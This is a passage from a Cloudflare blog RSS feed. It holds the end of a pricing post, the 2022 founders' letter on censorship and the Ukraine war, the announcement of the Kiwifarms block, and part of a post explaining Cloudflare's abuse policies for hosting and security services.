            </figure><p><i>Slide from the</i> <a href="https://www.youtube.com/watch?v=XeKWeBw1R5A"><i>Cloudflare Launch Presentation at TechCrunch Disrupt, September 27, 2010</i></a>‌‌</p><p>In June 2012, we <a href="/introducing-cloudflare-business-and-cloudflar/">introduced our Business Plan for $200 per month</a> and our Enterprise Plan which was customized for our largest customers. By then we'd not only gotten Tokyo to work reliably but <a href="https://www.cloudflare.com/press-releases/2012/cloudflares-rocketship-growth-100-million-daily-active-users-50-billion/">added 18 more data centers</a> around the world for a total of 23. Our Business plan added DDoS mitigation as the primary benefit, something prior to then we'd been terrified to offer.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5qdTOuqKTYRYEMIsFe6hRc/095471d95593bc5a6ea55989b40041c3/image1-73.png" />
            
            </figure><p><i>Cloudflare’s Network as of June 16, 2012, courtesy of</i> <a href="https://web.archive.org/web/20120616135819/http://www.cloudflare.com:80/network-map"><i>The Internet Archive’s Wayback Machine</i></a>‌‌</p>
    <div>
      <h3>My how you've grown</h3>
      <a href="#my-how-youve-grown">
        
      </a>
    </div>
    <p>Fast-forward to today and a lot has changed. We're up to presence in more than <a href="https://www.cloudflare.com/network/">275 cities in more than 100 countries worldwide</a>. We included HTTPS support in our Free Plan with the launch of <a href="/introducing-universal-ssl/">Universal SSL in September 2014</a>. We included unlimited DDoS mitigation in our Free Plan with the launch of <a href="/unmetered-mitigation/">Unmetered DDoS Mitigation in September 2017</a>. Today, we stop attacks for Free Plan customers on a daily basis that are more than 10-times as big as what was <a href="/the-ddos-that-almost-broke-the-internet/">headline news back in 2013</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7wSDBH2quLOUNhwF9TIvEg/8d04c4b42e3117061891de4dc335541e/The-Cloudflare-Global-Network.png" />
            
            </figure><p>Our strategy has always been to roll features out, limit them at first to higher tiers of paying customers, but, over time, roll them down through our plans and eventually to even our Free Plan customers. We believe everyone should be fast, reliable, and secure online regardless of their budget. And we believe our continued success should be primarily driven by new innovation, not by milking old features for revenue.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RBIwmzQ7fr1g2XCZ2I6E1/f7d61ad2f0b327dc5ba86b08e368ddd6/Innovation-Milestones-2-K-1.png" />
            
            </figure><p>And we've delivered on that promise, accelerating our roll-out of new features across our platform and bundling them into our existing plans without increasing prices. What you get for our Free, Pro, and Business Plans today is orders of magnitude more valuable across every dimension — performance, reliability, and security — than those plans were when they launched.</p><p>And yet we know we are our customers’ infrastructure. You rely on us. And therefore we have been very reluctant to ever raise prices just to take price and capture more revenue.</p>
    <div>
      <h3>Annual plans for even faster innovation</h3>
      <a href="#annual-plans-for-even-faster-innovation">
        
      </a>
    </div>
    <p>Early on, we only charged monthly because we were an unproven service we knew customers were taking a risk on. Today, that's no longer the case. The majority of our customers have been using us for years and, from our conversations with them, plan to continue using us for the foreseeable future. In fact, one of the top requests we receive is from customers who want to pay once per year rather than getting billed every month.</p><p>While I'm proud of our pace of innovation, one of the challenges we have is managing the cash flow to fund those investments as quickly as we'd like. We invest up front in building out our network or developing a new feature, but then only get paid monthly by our customers. That, inherently, is a governor on our pace of innovation. We can invest even faster — hire more engineers, deploy more servers — if those customers who know they're going to use us for the next year pay for us up front. We have no shortage of things we know customers want us to build, so by collecting revenue earlier we know we can unlock even faster innovation.</p><p>In other words, we are making this change hoping most of you won't pay us anything more than you did before. Instead, our hope is that most of you will adopt our annual plans — you’ll get to lock in the existing pricing, and you’ll help us further accelerate our network growth and pace of innovation.</p><p>Finally, I wanted to mention that something isn't changing: our Free Plan. It will still be free. It will still have all the features it has today. And we're still committed to, over time, rolling many more features that are only available in paid plans today down to the Free Plan over time. Our mission is to help build a better Internet. We want to win by being the most innovative company in the world. And that means making our services available to as many people as possible, even those who can't afford to pay us right now.</p><p>But, for those of you who can pay: thank you. You've funded our innovation to date. And I hope you'll opt to switch to our annual billing, so we can further accelerate our network expansion and pace of innovation.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CKc3ykFkVIw5cxAX1f17f/16faf5e12ed74e481dbcfaf4da6bbe48/unnamed-6.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7hIsHQoXPfwoHjBcBQj5OR</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2022 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflares-annual-founders-letter-2022/</link>
            <pubDate>Sun, 25 Sep 2022 19:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched on September 27, 2010. This week we'll celebrate our 12th birthday. As has become our tradition, we'll be announcing a series of products that we think of as our gifts back to the Internet ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudflare launched on September 27, 2010. This week we'll celebrate our 12th birthday. As has become our tradition, we'll be announcing a series of products that we think of as our gifts back to the Internet. In previous years, these have included products and initiatives like <a href="/introducing-universal-ssl/">Universal SSL</a>, <a href="/introducing-cloudflare-workers/">Cloudflare Workers</a>, our <a href="/cloudflare-registrar/">Zero Markup Registrar</a>, the <a href="/bandwidth-alliance/">Bandwidth Alliance</a>, and <a href="/introducing-r2-object-storage/">R2</a> — <a href="/introducing-r2-object-storage/">our zero egress fee object store</a> — which <a href="/r2-ga/">went GA last week</a>.</p><p>We're really excited for what we'll be announcing this year and hope to surprise and delight all of you over the course of the week with the products and features we believe live up to our mission of helping build a better Internet.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2kae6HfsCSTPYMc7A3kTw3/5c70fd424d1913fd1ba8eeb4bbbd384e/image5-15.png" />
            
            </figure>
    <div>
      <h3>Founders' letter</h3>
      <a href="#founders-letter">
        
      </a>
    </div>
    <p>While this will be our 12th Birthday Week of product announcements, for the <a href="/a-letter-from-cloudflares-founders-2020/">last</a> <a href="/cloudflares-annual-founders-letter-2021/">two</a> years, as the cofounders of the company, we've also taken this time as an opportunity to write a letter publicly reflecting on the previous year and what's on our minds as we go into the year ahead.</p><p>Since our last birthday, it's been a tale of two halves of a very different year. At the end of 2021 and into the first two months of 2022, COVID infection rates were falling globally, effective vaccines were getting rolled out, and the world seemed to be returning to a sense of pre-pandemic normalcy.</p><p>Internally, we were starting to meet again in person with colleagues and customers. We'd weathered an unprecedented increase in traffic across our network caused by the pandemic and, with a few bumps along the way, used the challenges we'd faced through that time to rebuild our architecture to be more stable and reliable for the long term. We both felt optimistic for the future.</p>
    <div>
      <h3>Russia's invasion of Ukraine</h3>
      <a href="#russias-invasion-of-ukraine">
        
      </a>
    </div>
    <p>Then, on February 24, Russia invaded Ukraine. While we were fortunate to not have team members working from Russia, Ukraine, or Belarus, we have many employees with families in the region and six offices within a train ride of the front lines. We watched in real time as Internet <a href="/internet-traffic-patterns-in-ukraine-since-february-21-2022/">traffic patterns across Ukraine shifted</a>, a disturbing reflection of what was happening on the ground as cities were bombed and families fled.</p><p>At the same time, Russia ratcheted up their efforts to censor their country's Internet of all non-Russia media. While we had seen some Internet restrictions in Russia over the years, historically Russian citizens were generally able to freely access nearly any resources online. The dramatically increased censorship marked an extreme change in policy and the first time a country of any scale had tried to go from a generally open Internet to one that was fully censored.</p>
    <div>
      <h3>Glimmers of hope</h3>
      <a href="#glimmers-of-hope">
        
      </a>
    </div>
    <p>But, even as the war continues to rage, there is reason for optimism. In spite of a significant increase in censorship inside Russia, physical links to the rest of the world being cut in Ukraine, cyber attacks targeting Ukrainian infrastructure, and Russian forces actively rerouting BGP in invaded regions, by and large the Internet has continued to flow. As John Gilmore once famously said: "The Internet sees censorship as damage and routes around it."</p><p>The private sector and governments around the world came together to help support Ukraine and render Russian cyberattacks largely moot. Our team provided our services for free to government, financial services, media, and civil society organizations that came under cyber attack, ensuring they stayed online. As the physical Internet links were severed in the country, <a href="/steps-taken-around-cloudflares-services-in-ukraine-belarus-and-russia/">our network teams worked to route traffic through every possible path</a> to ensure not only could news from outside Ukraine get in but, equally importantly, pictures and news of the war could get out.</p><p>Those pictures and news of what is happening inside Ukraine continue to galvanize support. The Ukrainian government continues to function in spite of withering cyber attacks. Voices inside Russia pushing back against the regime are increasingly being heard. And ordinary Russian citizens have increasingly turned to services like <a href="https://one.one.one.one/">Cloudflare's 1.1.1.1 App</a> to see uncensored news, in record numbers.</p><p>Our efforts to keep the Internet on in Russia led the Putin regime to officially sanction one of us (Matthew) — a sign we took that we were making a positive impact. Today we estimate approximately 5% of all households in the country are continuing to access the uncensored Internet using our 1.1.1.1 App, and that number continues to grow.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4omfFiGtAfNbYyJa4Gc9Oc/5b852b4f4d620a9897e2841216ad31f1/image7-5.png" />
            
            </figure>
    <div>
      <h3>The Internet's current battleground</h3>
      <a href="#the-internets-current-battleground">
        
      </a>
    </div>
    <p>2022 was not the first year in which the Internet became a battleground, but to us, it does feel like a turning point. In the last twelve months, we've seen <a href="/q2-2022-internet-disruption-summary/">more countries shut down Internet access than in any previous year</a>. Sometimes this is just a misguided and ineffectual effort to keep students from cheating on national exams. Unfortunately, increasingly, it's about repressive regimes attempting to assert control.</p><p>As we write this, the <a href="/protests-internet-disruption-ir/">Iranian government is attempting to silence protests in the country through broad Internet censorship</a>. While some may suggest this is business as usual, in fact it is not. The Internet and the broad set of news and opinions it brings have generally been available in places like Iran and Russia, and we shouldn't accept that full censorship in them is the de facto status quo.</p><p>And these efforts to reign in the Internet are unfortunately not limited to Iran and Russia. Even in the liberal, democratic corners of Western Europe, incidents in which court ordered blocking at the infrastructure layer resulting in massive overblocking spiked dramatically over the last year. Those cases will set a dangerous precedent that a single court in a single country can block access to wide swaths of the Internet.</p><p>While it may seem ok to Austrians for an Austrian court to enforce Austrian values for an issue within Austria, if any country's courts can block content at the core Internet infrastructure level even when it results in the blocking of unrelated sites then it will have a global impact. And, inherently, it will open the door for Afghanistan, Albania, Algeria, Andorra, Angola, Antigua, Argentina, Armenia, Australia, and Azerbaijan to do the same. And that's just the countries that start with the letter A. If these precedents are upheld then the Internet risks falling to the lowest common denominator of what's globally acceptable.</p>
    <div>
      <h3>An old threat to permissionless innovation</h3>
      <a href="#an-old-threat-to-permissionless-innovation">
        
      </a>
    </div>
    <p>The magic of the early Internet was that it was permissionless. Cloudflare was founded to counter an old and very different threat to that magic than we face today. Early in Cloudflare's history, we used to get asked who we were competing against. We have never thought the answer was <a href="https://www.cloudflare.com/cloudflare-vs-akamai/">Akamai</a> or EdgeCast. While, from a business perspective, we always thought of our business as <a href="https://www.youtube.com/watch?v=T47T_mG7YbU">replacing the vast catalog of Cisco's hardware boxes with scalable services</a>, that transition seemed inevitable. Instead, the existential competitor we faced was a threat to the permissionless Internet itself: Facebook.</p><p>If you find your eyebrow raised as you read that, know you're not alone. It was the universal reaction we’d get whenever we said that back in 2010, and it remains the universal reaction we get when we say it today. But it has always rung true. In 2010, when Cloudflare launched, it was getting so difficult to be online — between spam, hackers, DDoS, reliability, and performance issues — that many people, organizations, and businesses gave up on the web and sought a safe space in Facebook's walled garden.</p><p>If the challenges of being online weren't solved in some other way, there was real risk that Facebook would, effectively, become the Internet. The magic of the Internet was that anyone with an idea could put it online and, if it resonated, thrive without having to pass through a gatekeeper. It seemed wrong to us that if those trends continued you'd have to effectively get Facebook's permission just be online. Preserving the permissionless Internet was a big part of what motivated us to start Cloudflare.</p><p>So we set out to help solve the problems of cyberattacks, outages, and other performance challenges making sure that the Internet we believed in could continue to thrive. We built a global network able to mitigate the largest DDoS attacks easily, and to make anything connected to the Internet faster, more secure, and more reliable. We created tools to make it easy for developers to build and maintain new platforms, with the ability to deploy serverless code in an instant across the globe. We developed new ways for our customers to protect their internal systems from attack with <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> services. And we made it all as widely available as possible, constantly striving to provide accessible tools not only to the Fortune 1000 but also to the small businesses, nonprofits, and developers with ideas about how to build something new, creative, and good for the world.</p><p>It's not dissimilar to the story of another disruptive tech company that began a few years before we did. Shopify has been a long time Cloudflare customer using a number of our services, including our Workers developer platform. Their <a href="https://qz.com/1954108/shopify-is-arming-the-rebels-against-amazon/">unofficial rallying cry of "arming the rebels"</a> has always resonated with us.</p><p>In many ways, Shopify is to Amazon.com as Cloudflare is to Facebook. Both of the former providing the key infrastructure you need to innovate and then getting out of your way, both of the latter building a walled garden from which they can ultimately extract maximum rents.</p>
    <div>
      <h3>A New Hope</h3>
      <a href="#a-new-hope">
        
      </a>
    </div>
    <p>Shopify framing their customers as the rebels taking on the Empire of Amazon is, of course, a reference to Star Wars and so it may not be surprising that we often talk internally about the Star Wars movies as a metaphor for the history of the Internet: past, present, and maybe future.</p><p>The first movie, Episode IV, was titled "A New Hope." The plot of that movie feels a lot like how the world experienced the Internet for the 40 years prior to 2016. There was this magical thing called the Force, and it was controlled by these incredible people called Jedi. Except instead of the Force it was the Internet and instead of Jedi it was programmers and network engineers.</p><p>It's easy to forget that it's the stuff of not-too-long-ago science fiction that you could have a device in your pocket that could access the sum of all human knowledge. And yet, there are now more smartphones in active use than humans on Earth. Neither of us feel all that old, yet we both grew up in a time when if you had an opinion and wanted to get it out to a broad audience you had to write it up, send it in as a letter to the editor, and hope that it would get published.</p><p>Today in the world of Twitter and TikTok that is almost unimaginably quaint. The Internet blew that all up, just as Luke blew up the Death Star, and it's hard to overstate how much that disrupted every traditional source of power and control.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TF9nMjjzmmBnDd9r8EXQq/8402026c35baaf3585e9c2e56431b504/image2-34.png" />
            
            </figure>
    <div>
      <h3>The Empire Strikes Back</h3>
      <a href="#the-empire-strikes-back">
        
      </a>
    </div>
    <p>But after Episode IV came Episode V: “The Empire Strikes Back.” And make no mistake, the traditional centers of control are working hard to find ways to control the Internet. While we think the shift came somewhere around 2016, it feels like in 2022 the Empire has discovered the rebel base on Hoth and the AT-ATs are closing in.</p><p>Episode V is a pretty dark movie. Spoiler alert for the small percentage of you who may not have seen it, but the hero realizes his mortal enemy is his father, loses his hand, his rogue friend is encased in carbonite, and the girl he likes sold into slug slavery shortly after she declares her love for not him but the about-to-be-carbonite-encased friend. But it's also the best movie because the stakes are so high.</p><p>The stakes are high for the Internet too, and we believe it's important for us to engage on the hard technology and policy issues. The next several years will be challenging as we rebuild the legacy protocols of the Internet to be more private and secure by design, so they can accommodate what the Internet has become, and wrestle with hard policy issues around respecting local laws and norms on a network that is inherently global. The team at Cloudflare comes to work every day appreciating the challenges and importance of what we need to help do to live up to our mission.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2vs1W1ieZHQS8rQZpJuqtF/5d6553ad62313e42a2d5ba4dd5d0bc76/image1-41.png" />
            
            </figure>
    <div>
      <h3>Helping build a better Internet</h3>
      <a href="#helping-build-a-better-internet">
        
      </a>
    </div>
    <p>Our mission is to help build a better Internet, and we are proud that more than 20% of the web and 30% of the Fortune 1,000 relies on Cloudflare to be fast, reliable, secure, efficient, and private for whatever they are doing online. Throughout the year we have Innovation Weeks usually dedicated to new products to sell to our customers. But, during our Birthday Week, we give back with products and initiatives that aren’t designed to generate revenue, but instead we provide them because they improve the fundamentals of how the Internet works.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6KLMbiDI9nD9uMjbsZbq2i/6f38c7255b542f51f10644375039b44e/image4-13.png" />
            
            </figure><p>And so this year we'll be launching new services and partnerships to make the best security practices more affordable and bring them more easily to an increasingly mobile world. We're helping developers access more resources they need to deliver the next generation of applications. And we're launching privacy-preserving alternatives to widely used services because we believe a better Internet is a more private Internet.</p><p>We're not ready to declare that it's time for the Ewoks to start dancing, but we are proud of our continued innovation and the thoughtfulness of our team as we navigate these challenging times. Although the global economy continues to provide uncertain headwinds as we head into the new year, we are confident we have the plan and the team that will make us successful.</p><p>Thank you to our team, our customers, and our investors. Happy 12th birthday to Cloudflare. And, as always: we're just getting started.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/65DdtpxOGf3GYUzK4IODA1/85eeb7cfd59f9bba67dd08b0ca5b8c4a/image3-27.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <category><![CDATA[Cloudflare History]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">13XWlg4xYVsXIPDfTdrYF9</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Blocking Kiwifarms]]></title>
            <link>https://blog.cloudflare.com/kiwifarms-blocked/</link>
            <pubDate>Sat, 03 Sep 2022 22:15:35 GMT</pubDate>
            <description><![CDATA[ We have blocked Kiwifarms. Visitors to any of the Kiwifarms sites that use any of Cloudflare's services will see a Cloudflare block page and a link to this post.  ]]></description>
            <content:encoded><![CDATA[ <p>We have blocked Kiwifarms. Visitors to any of the Kiwifarms sites that use any of Cloudflare's services will see a Cloudflare block page and a link to this post. Kiwifarms may move their sites to other providers and, in doing so, come back online, but we have taken steps to block their content from being accessed through our infrastructure.</p><p>This is an extraordinary decision for us to make and, given Cloudflare's role as an Internet infrastructure provider, a dangerous one that we are not comfortable with. However, the rhetoric on the Kiwifarms site and specific, targeted threats have escalated over the last 48 hours to the point that we believe there is an unprecedented emergency and immediate threat to human life unlike we have previously seen from Kiwifarms or any other customer before.</p>
    <div>
      <h3>Escalating threats</h3>
      <a href="#escalating-threats">
        
      </a>
    </div>
    <p>Kiwifarms has frequently been host to revolting content. Revolting content alone does not create an emergency situation that necessitates the action we are taking today. Beginning approximately two weeks ago, a pressure campaign started with the goal to deplatform Kiwifarms. That pressure campaign targeted Cloudflare as well as other providers utilized by the site.</p><p>Cloudflare provided security services to Kiwifarms, protecting them from DDoS and other cyberattacks. We have never been their hosting provider. <a href="/cloudflares-abuse-policies-and-approach/">As we outlined last Wednesday</a>, we do not believe that terminating security services is appropriate, even to revolting content. In a law-respecting world, the answer to even illegal content is not to use other illegal means like DDoS attacks to silence it.</p><p>We are also not taking this action directly because of the pressure campaign. While we have empathy for its organizers, we are committed as a security provider to protecting our customers even when they run deeply afoul of popular opinion or even our own morals. The <a href="/cloudflares-abuse-policies-and-approach/">policy we articulated last Wednesday remains our policy</a>. We continue to believe that the best way to relegate cyberattacks to the dustbin of history is to give everyone the tools to prevent them.</p><p>However, as the pressure campaign escalated, so did the rhetoric on the Kiwifarms site. Feeling attacked, users of Kiwifarms became even more aggressive. Over the last two weeks, we have proactively reached out to law enforcement in multiple jurisdictions highlighting what we believe are potential criminal acts and imminent threats to human life that were posted to the site.</p>
    <div>
      <h3>Legal process</h3>
      <a href="#legal-process">
        
      </a>
    </div>
    <p>While law enforcement in these areas are working to investigate what we and others reported, unfortunately the process is moving more slowly than the escalating risk. While we believe that in every other situation we have faced — including the Daily Stormer and 8chan — it would have been appropriate as an infrastructure provider for us to wait for legal process, in this case the imminent and emergency threat to human life which continues to escalate causes us to take this action.</p><p>Hard cases make bad law. This is a hard case and we would caution anyone from seeing it as setting precedent. The <a href="/cloudflares-abuse-policies-and-approach/">policies we articulated last Wednesday remain our policies</a>. For an infrastructure provider like Cloudflare, legal process is still the correct way to deal with revolting and potentially illegal content online.</p><p>But we need a mechanism when there is an emergency threat to human life for infrastructure providers to work expediently with legal authorities in order to ensure the decisions we make are grounded in due process. Unfortunately, that mechanism does not exist and so we are making this uncomfortable emergency decision alone.</p>
    <div>
      <h3>Not the end</h3>
      <a href="#not-the-end">
        
      </a>
    </div>
    <p>Finally, we are aware and concerned that our action may only fan the flames of this emergency. Kiwifarms itself will most likely find other infrastructure that allows them to come back online, as the Daily Stormer and 8chan did themselves after we terminated them. And, even if they don't, the individuals that used the site to increasingly terrorize will feel even more isolated and attacked and may lash out further. There is real risk that by taking this action today we may have further heightened the emergency.</p><p>We will continue to work proactively with law enforcement to help with their investigations into the site and the individuals who have posted what may be illegal content to it. And we recognize that while our blocking Kiwifarms temporarily addresses the situation, it by no means solves the underlying problem. That solution will require much more work across society. We are hopeful that our action today will help provoke conversations toward addressing the larger problem. And we stand ready to participate in that conversation.</p> ]]></content:encoded>
            <category><![CDATA[Abuse]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">7tWDjvEz0pDvEf8xc8Zk0H</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare's abuse policies & approach]]></title>
            <link>https://blog.cloudflare.com/cloudflares-abuse-policies-and-approach/</link>
            <pubDate>Wed, 31 Aug 2022 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched nearly twelve years ago. Over that time, our set of services has become much more complicated. With that complexity we have developed policies around how we handle abuse of different features Cloudflare provides ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6KFpKT5IYgDuwxdCYL4S1s/babd5693105204319201da5b58e6b98b/The-Cloudflare-Blog-1.png" />
            
            </figure><p>Cloudflare launched nearly twelve years ago. We’ve grown to operate a network that spans more than 275 cities in over 100 countries. We have millions of customers: from small businesses and individual developers to approximately 30 percent of the Fortune 500. Today, more than 20 percent of the web relies directly on Cloudflare’s services.</p><p>Over the time since we launched, our set of services has become much more complicated. With that complexity we have developed policies around how we handle abuse of different Cloudflare features. Just as a broad platform like Google has different abuse policies for search, Gmail, YouTube, and Blogger, Cloudflare has <a href="/out-of-the-clouds-and-into-the-weeds-cloudflares-approach-to-abuse-in-new-products/">developed different abuse policies</a> as we have introduced new products.</p><p>We published our updated approach to abuse last year at:</p><p><a href="https://www.cloudflare.com/trust-hub/abuse-approach/">https://www.cloudflare.com/trust-hub/abuse-approach/</a></p><p>However, as questions have arisen, we thought it made sense to describe those policies in more detail here.  </p><p>The policies we built reflect ideas and recommendations from human rights experts, activists, academics, and regulators. Our guiding principles require abuse policies to be specific to the service being used. This is to ensure that any actions we take both reflect the ability to address the harm and minimize unintended consequences. We believe that someone with an abuse complaint must have access to an abuse process to reach those who can most effectively and narrowly address their complaint — anonymously if necessary. And, critically, we strive always to be transparent about both our policies and the actions we take.</p>
    <div>
      <h3>Cloudflare's products</h3>
      <a href="#cloudflares-products">
        
      </a>
    </div>
    <p>Cloudflare provides a broad range of products that fall generally into three buckets: hosting products (e.g., Cloudflare Pages, Cloudflare Stream, Workers KV, Custom Error Pages), security services (e.g., DDoS Mitigation, Web Application Firewall, Cloudflare Access, Rate Limiting), and core Internet technology services (e.g., Authoritative DNS, Recursive DNS/1.1.1.1, WARP). For a complete list of our products and how they map to these categories, you can see our <a href="https://www.cloudflare.com/trust-hub/abuse-approach/">Abuse Hub</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/0jGLSWqF5X7h8ZGsARPIe/50f3abc20a250a34dbd27647f721de1b/pasted-image-0--2--1.png" />
            
            </figure><p>As described below, our policies take a different approach on a product-by-product basis in each of these categories.</p>
    <div>
      <h3>Hosting products</h3>
      <a href="#hosting-products">
        
      </a>
    </div>
    <p>Hosting products are those products where Cloudflare is the ultimate host of the content. This is different from products where we are merely providing security or temporary caching services and the content is hosted elsewhere. Although many people confuse our security products with hosting services, we have distinctly different policies for each. Because the vast majority of Cloudflare customers do not yet use our hosting products, abuse complaints and actions involving these products are currently relatively rare.</p><p>Our decision to disable access to content in hosting products fundamentally results in that content being taken offline, at least until it is republished elsewhere. Hosting products are subject to our <a href="https://www.cloudflare.com/trust-hub/abuse-approach/">Acceptable Hosting Policy</a>. Under that policy, for these products, we may remove or disable access to content that we believe:</p><ul><li><p>Contains, displays, distributes, or encourages the creation of child sexual abuse material, or otherwise exploits or promotes the exploitation of minors.</p></li><li><p>Infringes on intellectual property rights.</p></li><li><p>Has been determined by appropriate legal process to be defamatory or libelous.</p></li><li><p>Engages in the unlawful distribution of controlled substances.</p></li><li><p>Facilitates human trafficking or prostitution in violation of the law.</p></li><li><p>Contains, installs, or disseminates any active malware, or uses our platform for exploit delivery (such as part of a command and control system).</p></li><li><p>Is otherwise illegal, harmful, or violates the rights of others, including content that discloses sensitive personal information, incites or exploits violence against people or animals, or seeks to defraud the public.</p></li></ul><p>We maintain discretion in how our Acceptable Hosting Policy is enforced, and generally seek to apply content restrictions as narrowly as possible. For instance, if a shopping cart platform with millions of customers uses Cloudflare Workers KV and one of their customers violates our Acceptable Hosting Policy, we will not automatically terminate the use of Cloudflare Workers KV for the entire platform.</p><p>Our guiding principle is that organizations closest to content are best at determining when the content is abusive. It also recognizes that overbroad takedowns can have significant unintended impact on access to content online.</p>
    <div>
      <h3>Security services</h3>
      <a href="#security-services">
        
      </a>
    </div>
    <p>The overwhelming majority of Cloudflare's millions of customers use only our security services. Cloudflare made a decision early in our history that we wanted to make security tools as widely available as possible. This meant that we provided many tools for free, or at minimal cost, to best limit the impact and effectiveness of a wide range of cyberattacks. Most of our customers pay us nothing.</p><p>Giving everyone the ability to sign up for our services online also reflects our view that cyberattacks not only should not be used for silencing vulnerable groups, but are not the appropriate mechanism for addressing problematic content online. We believe cyberattacks, in any form, should be relegated to the dustbin of history.</p><p>The decision to provide security tools so widely has meant that we've had to think carefully about when, or if, we ever terminate access to those services. We recognized that we needed to think through what the effect of a termination would be, and whether there was any way to set standards that could be applied in a fair, transparent and non-discriminatory way, consistent with human rights principles.</p><p>This is true not just for the content where a complaint may be filed  but also for the precedent the takedown sets. Our conclusion — informed by all of the many conversations we have had and the thoughtful discussion in the broader community — is that voluntarily terminating access to services that protect against cyberattack is not the correct approach.</p>
    <div>
      <h3>Avoiding an abuse of power</h3>
      <a href="#avoiding-an-abuse-of-power">
        
      </a>
    </div>
    <p>Some argue that we should terminate these services to content we find reprehensible so that others can launch attacks to knock it offline. That is the equivalent argument in the physical world that the fire department shouldn't respond to fires in the homes of people who do not possess sufficient moral character. Both in the physical world and online, that is a dangerous precedent, and one that is over the long term most likely to disproportionately harm vulnerable and marginalized communities.</p><p>Today, more than 20 percent of the web uses Cloudflare's security services. When considering our policies we need to be mindful of the impact we have and precedent we set for the Internet as a whole. Terminating security services for content that our team personally feels is disgusting and immoral would be the popular choice. But, in the long term, such choices make it more difficult to protect content that supports oppressed and marginalized voices against attacks.</p>
    <div>
      <h3>Refining our policy based on what we’ve learned</h3>
      <a href="#refining-our-policy-based-on-what-weve-learned">
        
      </a>
    </div>
    <p>This isn't hypothetical. Thousands of times per day we receive calls that we terminate security services based on content that someone reports as offensive. Most of these don’t make news. Most of the time these decisions don’t conflict with our moral views. Yet two times in the past we decided to terminate content from our security services because we found it reprehensible. In 2017, we terminated the neo-Nazi troll site <a href="/why-we-terminated-daily-stormer/">The Daily Stormer</a>. And in 2019, we terminated the conspiracy theory forum <a href="/terminating-service-for-8chan/">8chan</a>.</p><p>In a deeply troubling response, after both terminations we saw a dramatic increase in authoritarian regimes attempting to have us terminate security services for human rights organizations — often citing the language from our own justification back to us.</p><p>Since those decisions, we have had significant discussions with policy makers worldwide. From those discussions we concluded that the power to terminate security services for the sites was not a power Cloudflare should hold. Not because the content of those sites wasn't abhorrent — it was — but because security services most closely resemble Internet utilities.</p><p>Just as the telephone company doesn't terminate your line if you say awful, racist, bigoted things, we have concluded in consultation with politicians, policy makers, and experts that turning off security services because we think what you publish is despicable is the wrong policy. To be clear, just because we did it in a limited set of cases before doesn’t mean we were right when we did. Or that we will ever do it again.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7tBErj7SMPOb8RTPTfKVam/f785844a18b57a059bdd25a08fe47e54/pasted-image-0--4--3.png" />
            
            </figure><p>But that doesn’t mean that Cloudflare can’t play an important role in protecting those targeted by others on the Internet. We have long supported human rights groups, journalists, and other uniquely vulnerable entities online through <a href="https://www.cloudflare.com/galileo/">Project Galileo</a>. Project Galileo offers free cybersecurity services to nonprofits and advocacy groups that help strengthen our communities.</p><p>Through the <a href="https://www.cloudflare.com/athenian/">Athenian Project</a>, we also play a role in protecting election systems throughout the United States and abroad. Elections are one of the areas where the systems that administer them need to be fundamentally trustworthy and neutral. Making choices on what content is deserving or not of security services, especially in any way that could in any way be interpreted as political, would undermine our ability to provide trustworthy protection of election infrastructure.</p>
    <div>
      <h3>Regulatory realities</h3>
      <a href="#regulatory-realities">
        
      </a>
    </div>
    <p>Our policies also respond to regulatory realities. Internet content regulation laws passed over the last five years around the world have largely drawn a line between services that host content and those that provide security and conduit services. Even when these regulations impose obligations on platforms or hosts to moderate content, they exempt security and conduit services from playing the role of moderator without legal process. This is sensible regulation borne of a thorough regulatory process.</p><p>Our policies follow this well-considered regulatory guidance. We prevent security services from being used by sanctioned organizations and individuals. We also terminate security services for content which is illegal in the United States — where Cloudflare is headquartered. This includes Child Sexual Abuse Material (CSAM) as well as content subject to Fight Online Sex Trafficking Act (FOSTA). But, otherwise, we believe that cyberattacks are something that everyone should be free of. Even if we fundamentally disagree with the content.</p><p>In respect of the rule of law and due process, we follow legal process controlling security services. We will restrict content in geographies where we have received legal orders to do so. For instance, if a court in a country prohibits access to certain content, then, following that court's order, we generally will restrict access to that content in that country. That, in many cases, will limit the ability for the content to be accessed in the country. However, we recognize that just because content is illegal in one jurisdiction does not make it illegal in another, so we narrowly tailor these restrictions to align with the jurisdiction of the court or legal authority.</p><p>While we follow legal process, we also believe that transparency is critically important. To that end, wherever these content restrictions are imposed, we attempt to link to the 